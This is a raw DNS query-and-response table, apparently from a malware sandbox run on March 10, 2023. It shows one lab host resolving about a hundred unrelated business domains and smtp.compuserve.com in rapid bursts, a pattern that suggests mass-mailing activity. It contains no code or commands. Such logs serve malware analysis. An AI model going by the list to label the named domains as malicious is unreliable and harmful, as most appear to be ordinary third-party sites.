                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.493074894 CET192.168.2.68.8.8.80x8838Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.494385004 CET192.168.2.68.8.8.80xbf79Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.645342112 CET192.168.2.68.8.8.80xb838Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:45.665941954 CET192.168.2.68.8.8.80xfdcbStandard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.040164948 CET192.168.2.68.8.8.80x125Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.337095976 CET192.168.2.68.8.8.80x2adeStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.337202072 CET192.168.2.68.8.8.80x3185Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.338473082 CET192.168.2.68.8.8.80xa866Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.338565111 CET192.168.2.68.8.8.80xc91bStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.339457035 CET192.168.2.68.8.8.80x533dStandard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.339858055 CET192.168.2.68.8.8.80xc2edStandard query (0)rast.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.341088057 CET192.168.2.68.8.8.80xd333Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.382267952 CET192.168.2.68.8.8.80xdddbStandard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.541440010 CET192.168.2.68.8.8.80x5debStandard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:46.789944887 CET192.168.2.68.8.8.80x225bStandard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.197874069 CET192.168.2.68.8.8.80x1927Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.431207895 CET192.168.2.68.8.8.80x8868Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.519715071 CET192.168.2.68.8.8.80xe02aStandard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:47.773371935 CET192.168.2.68.8.8.80xd333Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:48.243453026 CET192.168.2.68.8.8.80x417dStandard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:49.029117107 CET192.168.2.68.8.8.80xd333Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:51.435611010 CET192.168.2.68.8.8.80x90eaStandard query (0)smtp.compuserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.736797094 CET192.168.2.68.8.8.80xec3dStandard query (0)aiolos-sa.grA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.737489939 CET192.168.2.68.8.8.80x393fStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.737831116 CET192.168.2.68.8.8.80x427aStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.739088058 CET192.168.2.68.8.8.80xff7fStandard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.739299059 CET192.168.2.68.8.8.80xab27Standard query (0)univi.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.740061998 CET192.168.2.68.8.8.80x17daStandard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.740648985 CET192.168.2.68.8.8.80xa3afStandard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.741730928 CET192.168.2.68.8.8.80x6824Standard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.741770983 CET192.168.2.68.8.8.80xf148Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.742208958 CET192.168.2.68.8.8.80x8defStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.742640972 CET192.168.2.68.8.8.80x5f33Standard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.743364096 CET192.168.2.68.8.8.80x2544Standard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.743403912 CET192.168.2.68.8.8.80x8515Standard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.743868113 CET192.168.2.68.8.8.80x77cdStandard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.771368980 CET192.168.2.68.8.8.80x367dStandard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.778857946 CET192.168.2.68.8.8.80xa2f9Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.779624939 CET192.168.2.68.8.8.80x9460Standard query (0)themark.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.780527115 CET192.168.2.68.8.8.80x2307Standard query (0)madjek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.782953978 CET192.168.2.68.8.8.80x8720Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.807374001 CET192.168.2.68.8.8.80xeb73Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.823744059 CET192.168.2.68.8.8.80x3c12Standard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.823807955 CET192.168.2.68.8.8.80x612eStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.848468065 CET192.168.2.68.8.8.80xb5f7Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.851299047 CET192.168.2.68.8.8.80x4cb4Standard query (0)s5w.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.852828979 CET192.168.2.68.8.8.80x6489Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.855484009 CET192.168.2.68.8.8.80x405Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.855967045 CET192.168.2.68.8.8.80x8e81Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.855967045 CET192.168.2.68.8.8.80x2dc6Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.857914925 CET192.168.2.68.8.8.80xd950Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.860752106 CET192.168.2.68.8.8.80xfe91Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.861481905 CET192.168.2.68.8.8.80x716eStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.864408016 CET192.168.2.68.8.8.80xed39Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.866161108 CET192.168.2.68.8.8.80xd50cStandard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.867661953 CET192.168.2.68.8.8.80xfa7Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.868261099 CET192.168.2.68.8.8.80xb282Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.868299007 CET192.168.2.68.8.8.80x9ed1Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.869785070 CET192.168.2.68.8.8.80xe53fStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.869924068 CET192.168.2.68.8.8.80x92f9Standard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.870543957 CET192.168.2.68.8.8.80xd4f2Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.870992899 CET192.168.2.68.8.8.80x21f2Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.871682882 CET192.168.2.68.8.8.80xe245Standard query (0)xsui.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.871953011 CET192.168.2.68.8.8.80x4b5Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.872378111 CET192.168.2.68.8.8.80x2320Standard query (0)mijash3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.872714043 CET192.168.2.68.8.8.80x53f4Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.874002934 CET192.168.2.68.8.8.80xdd61Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.876194000 CET192.168.2.68.8.8.80x9b7cStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.877682924 CET192.168.2.68.8.8.80x2960Standard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.878678083 CET192.168.2.68.8.8.80x7528Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.891736984 CET192.168.2.68.8.8.80xfdbaStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.893448114 CET192.168.2.68.8.8.80x5a9cStandard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.903892994 CET192.168.2.68.8.8.80xa824Standard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.904197931 CET192.168.2.68.8.8.80xfd18Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.911179066 CET192.168.2.68.8.8.80xc6d6Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.913482904 CET192.168.2.68.8.8.80xd529Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.915147066 CET192.168.2.68.8.8.80x99abStandard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.931777000 CET192.168.2.68.8.8.80x1f8fStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.938009977 CET192.168.2.68.8.8.80x4ef6Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.941560030 CET192.168.2.68.8.8.80xb84bStandard query (0)hamaker.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.945677042 CET192.168.2.68.8.8.80xdc9bStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.945765018 CET192.168.2.68.8.8.80x5522Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.954047918 CET192.168.2.68.8.8.80x9e14Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.959575891 CET192.168.2.68.8.8.80xe6b6Standard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.960099936 CET192.168.2.68.8.8.80x9bf7Standard query (0)uhsa.edu.agA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.966037989 CET192.168.2.68.8.8.80x9b13Standard query (0)akdeniz.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.983133078 CET192.168.2.68.8.8.80x1510Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.995409012 CET192.168.2.68.8.8.80x8278Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:56.998399019 CET192.168.2.68.8.8.80x719cStandard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.016143084 CET192.168.2.68.8.8.80x171aStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.038758993 CET192.168.2.68.8.8.80x53f7Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.077642918 CET192.168.2.68.8.8.80xe7d9Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.141647100 CET192.168.2.68.8.8.80x88feStandard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.160588026 CET192.168.2.68.8.8.80x8d42Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.166651011 CET192.168.2.68.8.8.80x3713Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.168217897 CET192.168.2.68.8.8.80x57d6Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.195816040 CET192.168.2.68.8.8.80xd747Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.198904991 CET192.168.2.68.8.8.80xf011Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.206427097 CET192.168.2.68.8.8.80xd9f9Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.208482027 CET192.168.2.68.8.8.80x37f9Standard query (0)mkm-gr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.229481936 CET192.168.2.68.8.8.80x94b7Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.233411074 CET192.168.2.68.8.8.80x9e9eStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.235285044 CET192.168.2.68.8.8.80x9bd1Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.235369921 CET192.168.2.68.8.8.80xbcebStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.241847038 CET192.168.2.68.8.8.80xe256Standard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.256244898 CET192.168.2.68.8.8.80x2dStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.269089937 CET192.168.2.68.8.8.80x13aaStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.296230078 CET192.168.2.68.8.8.80x9be5Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:57.324346066 CET192.168.2.68.8.8.80x75adStandard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.049642086 CET8.8.8.8192.168.2.60x7445No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.049642086 CET8.8.8.8192.168.2.60x7445No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.059587955 CET8.8.8.8192.168.2.60x94e1No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.059587955 CET8.8.8.8192.168.2.60x94e1No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.074609995 CET8.8.8.8192.168.2.60xe276No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.074609995 CET8.8.8.8192.168.2.60xe276No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.077841997 CET8.8.8.8192.168.2.60xa0feName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.108165026 CET8.8.8.8192.168.2.60x2becNo error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.110497952 CET8.8.8.8192.168.2.60x32bbNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.110497952 CET8.8.8.8192.168.2.60x32bbNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.113353968 CET8.8.8.8192.168.2.60x2751Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.189827919 CET8.8.8.8192.168.2.60x7562No error (0)www.pdqhomes.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.189827919 CET8.8.8.8192.168.2.60x7562No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.189827919 CET8.8.8.8192.168.2.60x7562No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.189827919 CET8.8.8.8192.168.2.60x7562No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.280213118 CET8.8.8.8192.168.2.60xad0dNo error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.283178091 CET8.8.8.8192.168.2.60x6856No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.283178091 CET8.8.8.8192.168.2.60x6856No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.596704006 CET8.8.8.8192.168.2.60x8cfeNo error (0)www.rs-ag.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.596704006 CET8.8.8.8192.168.2.60x8cfeNo error (0)www.rs-ag.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.629110098 CET8.8.8.8192.168.2.60xe42eNo error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.629110098 CET8.8.8.8192.168.2.60xe42eNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.629110098 CET8.8.8.8192.168.2.60xe42eNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.996515989 CET8.8.8.8192.168.2.60xd4fdNo error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.996515989 CET8.8.8.8192.168.2.60xd4fdNo error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:15.996515989 CET8.8.8.8192.168.2.60xd4fdNo error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.112821102 CET8.8.8.8192.168.2.60xd069No error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.112821102 CET8.8.8.8192.168.2.60xd069No error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.112821102 CET8.8.8.8192.168.2.60xd069No error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.129194975 CET8.8.8.8192.168.2.60xb55cNo error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.135721922 CET8.8.8.8192.168.2.60x2d9dNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.135721922 CET8.8.8.8192.168.2.60x2d9dNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.135721922 CET8.8.8.8192.168.2.60x2d9dNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.147629976 CET8.8.8.8192.168.2.60x12c1No error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.147629976 CET8.8.8.8192.168.2.60x12c1No error (0)ghs.googlehosted.com216.58.215.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.272757053 CET8.8.8.8192.168.2.60x122aNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.915333033 CET8.8.8.8192.168.2.60x974bNo error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.915333033 CET8.8.8.8192.168.2.60x974bNo error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:16.915333033 CET8.8.8.8192.168.2.60x974bNo error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.047040939 CET8.8.8.8192.168.2.60x3c86Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.061038017 CET8.8.8.8192.168.2.60xf1e5No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.061038017 CET8.8.8.8192.168.2.60xf1e5No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.080935955 CET8.8.8.8192.168.2.60x1443No error (0)www.otena.com99.83.154.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.126019955 CET8.8.8.8192.168.2.60x3877No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.126019955 CET8.8.8.8192.168.2.60x3877No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.127832890 CET8.8.8.8192.168.2.60x409No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.127832890 CET8.8.8.8192.168.2.60x409No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.127832890 CET8.8.8.8192.168.2.60x409No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.137427092 CET8.8.8.8192.168.2.60x6b18No error (0)www.petsfan.comtraff-6.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.137427092 CET8.8.8.8192.168.2.60x6b18No error (0)traff-6.hugedomains.comhdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.137427092 CET8.8.8.8192.168.2.60x6b18No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com3.140.13.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.137427092 CET8.8.8.8192.168.2.60x6b18No error (0)hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com18.119.154.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.227588892 CET8.8.8.8192.168.2.60x20e1No error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:17.227588892 CET8.8.8.8192.168.2.60x20e1No error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.232557058 CET8.8.8.8192.168.2.60xbfa7No error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.232557058 CET8.8.8.8192.168.2.60xbfa7No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:18.232557058 CET8.8.8.8192.168.2.60xbfa7No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
